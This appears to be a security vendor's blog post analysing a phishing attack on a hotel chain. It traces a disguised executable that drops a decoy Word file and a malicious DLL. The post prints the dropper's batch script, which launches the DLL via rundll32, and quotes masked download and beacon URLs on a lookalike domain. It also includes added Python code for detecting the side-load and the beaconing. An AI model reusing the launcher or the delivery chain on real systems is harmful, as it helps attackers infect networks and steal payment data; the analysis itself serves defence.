Targeted attacks on hotel chains: a practical example



A recently published report described numerous cyber attacks on large hotel chains. The attacks were aimed mainly at stealing customers' bank card data, which the attackers achieved by infecting the hotels' POS terminals. A few days ago one of Panda Security's clients, a luxury hotel chain using Adaptive Defense 360, was attacked. We took the opportunity to show how cyber criminals try to penetrate corporate networks.

In most cases attacks of this type arrive by e-mail, either with an attached file that compromises the victim's computer or with a link to a page that exploits vulnerabilities to achieve the criminal's goal. In our client's case the attack began with an e-mail addressed to a hotel employee, stating that the attached file contained all the information needed to pay for a stay at the hotel at the end of May 2016.

The message carried an attachment in the form of an archive which, when opened, contained a file with a Microsoft Word icon. When the file was launched, it displayed the following:



This is a hotel reservation form filled in by a prospective guest, with payment details for a stay at the end of May 2016. At first glance there is nothing unusual here. In fact, the document is identical to the one this hotel employee sends to clients (even the name is similar). But if we look carefully, we see that the file arrived inside a zip archive and, although it shows a Word icon, it is an executable file.

When this file is run, three files are dropped to disk, and the first of them is executed:

- reader_sl.cmd
- ROCA.ING.docx
- adobeUpd.dll (MD5: A213E36D3869E626D4654BCE67F6760C)

The contents of the first file are shown below:

@echo off
start "" ROCA.ING.docx
Set xOS=x64
If "%PROCESSOR_ARCHITECTURE%"=="x86" If Not Defined PROCESSOR_ARCHITEW6432 Set xOS=x86
IF "%xOS%"=="x64" (start "" C:\Windows\SysWOW64\rundll32.exe adobeUpd.dll, Wenk)
IF "%xOS%"=="x86" (start "" C:\Windows\System32\rundll32.exe adobeUpd.dll, Wenk)
ping -n 12 localhost

As you can see, the first thing the script does is open the Word document, which serves as the decoy for the victim. It then checks whether Windows is 32- or 64-bit and launches adobeUpd.dll through rundll32.exe, calling the entry point named "Wenk"; on 64-bit Windows it picks the rundll32.exe from SysWOW64 (the 32-bit system binaries) rather than the native one in System32, and the final ping is the usual batch-file trick to pause for roughly ten seconds. At runtime the DLL file is modified, marked hidden and read-only, and a Windows registry entry is created so that it is started every time the computer boots.
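The launch chain above (cmd.exe running the dropped .cmd, which starts rundll32.exe with a DLL from the unpacked folder and an arbitrary entry point) leaves a clear process-creation footprint. The following Python is an added example written for this page, not code from the article or from Panda Security: it triages constructed Sysmon-style process-creation records for exactly that pattern, a rundll32 whose DLL resolves outside the system and Program Files directories, spawned by a script interpreter. The event records, the user path and the list of known system DLLs are assumptions made for the example; the rundll32 command-line syntax and the SysWOW64/System32 pair are as the dropper uses them.

```python
import ntpath
import re

# Directories from which rundll32 normally loads its DLL (lower-cased path prefixes).
TRUSTED_DLL_DIRS = (
    "c:\\windows\\system32\\",
    "c:\\windows\\syswow64\\",
    "c:\\program files\\",
    "c:\\program files (x86)\\",
)

# Bare DLL names the loader finds in the system directory before the working
# directory (illustrative list, an assumption of this example).
KNOWN_SYSTEM_DLLS = {"shell32.dll", "user32.dll", "setupapi.dll", "advpack.dll", "printui.dll"}

# Constructed process-creation records shaped like Sysmon Event ID 1 fields.
# Record 0 mirrors the dropper above: cmd.exe (running reader_sl.cmd from the
# folder the archive was unpacked to) starts rundll32 with adobeUpd.dll,Wenk.
EVENTS = [
    {"parent": "C:\\Windows\\System32\\cmd.exe",
     "image": "C:\\Windows\\SysWOW64\\rundll32.exe",
     "cwd": "C:\\Users\\frontdesk\\AppData\\Local\\Temp\\reservation\\",
     "cmdline": "C:\\Windows\\SysWOW64\\rundll32.exe adobeUpd.dll, Wenk"},
    {"parent": "C:\\Windows\\explorer.exe",
     "image": "C:\\Windows\\System32\\rundll32.exe",
     "cwd": "C:\\Windows\\System32\\",
     "cmdline": "rundll32.exe shell32.dll,Control_RunDLL desk.cpl"},
    {"parent": "C:\\Windows\\System32\\cmd.exe",
     "image": "C:\\Windows\\System32\\rundll32.exe",
     "cwd": "C:\\Windows\\System32\\",
     "cmdline": "rundll32.exe \"C:\\Users\\frontdesk\\Downloads\\setup.dll\",#1"},
    {"parent": "C:\\Windows\\explorer.exe",
     "image": "C:\\Windows\\System32\\rundll32.exe",
     "cwd": "C:\\Users\\frontdesk\\",
     "cmdline": "rundll32.exe C:\\Windows\\System32\\shell32.dll,OpenAs_RunDLL notes.txt"},
]

_RUNDLL32 = re.compile(r'^\s*"?(?:.*?\\)?rundll32(?:\.exe)?"?\s+(.*)$', re.I | re.S)


def parse_rundll32(cmdline):
    """Return (dll, entry_point) for a rundll32 command line, else None.

    rundll32 takes '<dll>,<entry> [args]'; the DLL may be quoted and a space
    after the comma is tolerated (the dropper uses 'adobeUpd.dll, Wenk').
    """
    m = _RUNDLL32.match(cmdline)
    if not m:
        return None
    rest = m.group(1).lstrip()
    if rest.startswith('"'):
        end = rest.find('"', 1)
        if end < 0:
            return None
        dll, rest = rest[1:end], rest[end + 1:]
    else:
        mm = re.match(r'([^,\s]+)(.*)$', rest, re.S)
        if not mm:
            return None
        dll, rest = mm.group(1), mm.group(2)
    rest = rest.lstrip()
    entry = None
    if rest.startswith(","):
        entry = re.match(r',\s*(\S*)', rest).group(1) or None
    return dll, entry


def resolve_dll(dll, cwd, image):
    """Approximate where the loader would find the DLL (simplified search order)."""
    if ntpath.isabs(dll):
        return ntpath.normpath(dll)
    if "\\" not in dll and dll.lower() in KNOWN_SYSTEM_DLLS:
        return ntpath.join(ntpath.dirname(image), dll)
    # Anything else (e.g. a freshly unpacked DLL) resolves against the working directory.
    return ntpath.normpath(ntpath.join(cwd, dll))


def flag_event(ev):
    """Return reasons the event resembles the dropper's rundll32 side-load, or []."""
    parsed = parse_rundll32(ev["cmdline"])
    if parsed is None:
        return []
    dll, entry = parsed
    reasons = []
    path = resolve_dll(dll, ev["cwd"], ev["image"]).lower()
    if not path.startswith(TRUSTED_DLL_DIRS):
        reasons.append("DLL loaded from outside trusted directories: " + path)
    if reasons and ntpath.basename(ev["parent"]).lower() == "cmd.exe":
        reasons.append("spawned by cmd.exe, i.e. script-driven")
    if reasons and entry is not None:
        reasons.append("entry point: " + entry)
    return reasons


def triage(events):
    """Map event index -> reasons, for every event that raised at least one."""
    result = {}
    for i, ev in enumerate(events):
        reasons = flag_event(ev)
        if reasons:
            result[i] = reasons
    return result


if __name__ == "__main__":
    for idx, reasons in triage(EVENTS).items():
        print(f"event {idx}: " + "; ".join(reasons))
```

Both rundll32 images are covered on purpose: a 64-bit host running this dropper shows the SysWOW64 binary, a 32-bit host the System32 one, so a rule keyed on a single image path would miss half the cases. The control records (Control Panel applets launched from explorer.exe with system DLLs) pass, while the two loads from user-writable paths are reported.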

It then contacts a specific URL:
www.************.ga/en/scripts/en.php?stream=lcc&user=iPmbzfAIRMFw

The response is a file containing the user identifier passed in the URL parameter (iPmbzfAIRMFw). If it matches, the malware attempts to download the file:

www.************.ga/en/scripts/iPmbzfAIRMFw.jpg

When we tried to download this file, it was no longer available. It never reached our client's system either, because the infection attempt was blocked and the malicious program never ran there. The domain in the URL is identical to our client's own domain, except that the client's domain is in the ".com" zone, while the attackers registered the same name in Gabon's ".ga" zone. A domain that resembles the company's own so closely would not attract attention if the hotel's security team analysed the network traffic.

Although the iPmbzfAIRMFw.jpg file was unavailable, the adobeUpd.dll code shows what would have been done with it: the DLL searches the downloaded file for a specific code sequence, decrypts the data it carries and runs the result as a PE executable (written to disk as "Temp\systm").

adobeUpd.dll then stays in a loop, connecting at random intervals of a few minutes to the following URL:
www.************.ga/en/scripts/en.php?mode=OPR&uid=iPmbzfAIRMFw&type=YFm
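The two network indicators in this story, a lookalike domain that differs from the hotel's own only in its TLD and a DLL that polls the same script at irregular intervals of a few minutes, can both be picked out of ordinary web-proxy logs. The Python below is an added example, not code from the article or from Panda Security. It runs over constructed log lines in which the hotel's domain is the placeholder examplehotel.com and the attackers' masked domain is stood in for by examplehotel.ga, while the URL path and query parameters are the ones quoted above. The log format, client address and timestamps are constructed, and the naive registrable-label split (no multi-part public suffixes such as co.uk) is a simplification.

```python
from collections import defaultdict
from datetime import datetime
from statistics import median
from urllib.parse import parse_qs, urlsplit

ORG_DOMAIN = "examplehotel.com"  # constructed stand-in for the hotel's real domain

# Constructed proxy log, one request per line: "<timestamp> <client> <method> <url>".
# The beacon path and query keys are the ones the article quotes; the host is a
# constructed lookalike of ORG_DOMAIN under the .ga TLD.
LOG = """\
2016-05-23T09:00:12 10.1.2.34 GET http://www.examplehotel.ga/en/scripts/en.php?mode=OPR&uid=iPmbzfAIRMFw&type=YFm
2016-05-23T09:01:40 10.1.2.34 GET http://www.examplehotel.com/en/reservations
2016-05-23T09:04:51 10.1.2.34 GET http://www.examplehotel.ga/en/scripts/en.php?mode=OPR&uid=iPmbzfAIRMFw&type=YFm
2016-05-23T09:08:03 10.1.2.34 GET http://www.examplehotel.ga/en/scripts/en.php?mode=OPR&uid=iPmbzfAIRMFw&type=YFm
2016-05-23T09:10:27 10.1.2.34 GET http://update.example-vendor.net/check
2016-05-23T09:13:58 10.1.2.34 GET http://www.examplehotel.ga/en/scripts/en.php?mode=OPR&uid=iPmbzfAIRMFw&type=YFm
2016-05-23T09:18:11 10.1.2.34 GET http://www.examplehotel.ga/en/scripts/en.php?mode=OPR&uid=iPmbzfAIRMFw&type=YFm
2016-05-23T09:22:46 10.1.2.34 GET http://www.examplehotel.ga/en/scripts/en.php?mode=OPR&uid=iPmbzfAIRMFw&type=YFm
2016-05-23T09:25:30 10.1.2.34 GET http://www.examplehotel.com/en/reservations
"""


def parse_log(text):
    """Split the constructed log into records with host, path and the set of query keys."""
    records = []
    for line in text.splitlines():
        ts, client, method, url = line.split(" ", 3)
        u = urlsplit(url)
        records.append({
            "ts": datetime.fromisoformat(ts),
            "client": client,
            "host": u.hostname.lower(),
            "path": u.path,
            # Only the key names matter for grouping; values such as uid may rotate.
            "qkeys": tuple(sorted(parse_qs(u.query))),
        })
    return records


def registrable(host):
    """Naive (label, tld) split: 'www.examplehotel.ga' -> ('examplehotel', 'ga').

    Assumption of this example: the data contains no multi-part public suffixes.
    """
    parts = host.split(".")
    return parts[-2], parts[-1]


def lookalike_hosts(records, org_domain=ORG_DOMAIN):
    """Hosts whose registrable label equals the organisation's but whose TLD differs."""
    org_label, org_tld = registrable(org_domain)
    hits = set()
    for r in records:
        label, tld = registrable(r["host"])
        if label == org_label and tld != org_tld:
            hits.add(r["host"])
    return sorted(hits)


def beacon_candidates(records, min_hits=5, min_gap=60, max_gap=900):
    """(client, host, path) triples polled repeatedly with a constant query shape.

    Jitter is tolerated on purpose: only the median gap between requests has to
    fall in the low-and-slow band, not every individual interval.
    """
    groups = defaultdict(list)
    for r in records:
        groups[(r["client"], r["host"], r["path"])].append(r)
    out = []
    for key, items in groups.items():
        if len(items) < min_hits:
            continue
        if len({r["qkeys"] for r in items}) != 1:
            continue
        times = sorted(r["ts"] for r in items)
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        if min_gap <= median(gaps) <= max_gap:
            out.append(key)
    return out


if __name__ == "__main__":
    recs = parse_log(LOG)
    print("lookalike domains:", lookalike_hosts(recs))
    print("beacon candidates:", beacon_candidates(recs))
```

The lookalike check is deliberately narrow (same label, different TLD) so that it can run on every log line cheaply; a fuller version would compare against the organisation's whole list of registered names and tolerate one-character edits. The beacon check groups by script path rather than full URL so that a rotating parameter value does not split the series.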

As we can see, this attack was targeted specifically at this hotel chain. The criminals have already removed all traces from the server the malware connected to, and since we interrupted the attack we can only guess what they intended to do next. In our experience, this type of attack aims to infect the remaining users on the victim company's network in order to reach the final goal: the POS terminals that process bank card payments, as we have observed in many other cases.

Traditional antivirus does not work against attacks of this type, because they are crafted for one specific victim and the attackers have made sure that their malware is not detected by the signatures, proactive technologies and other protection modules of the security solutions the victim uses. That is why it is extremely important to have EDR (Endpoint Detection & Response) services in combination with advanced protection technologies to defend effectively against such targeted attacks.

Source: https://habr.com/ru/post/283320/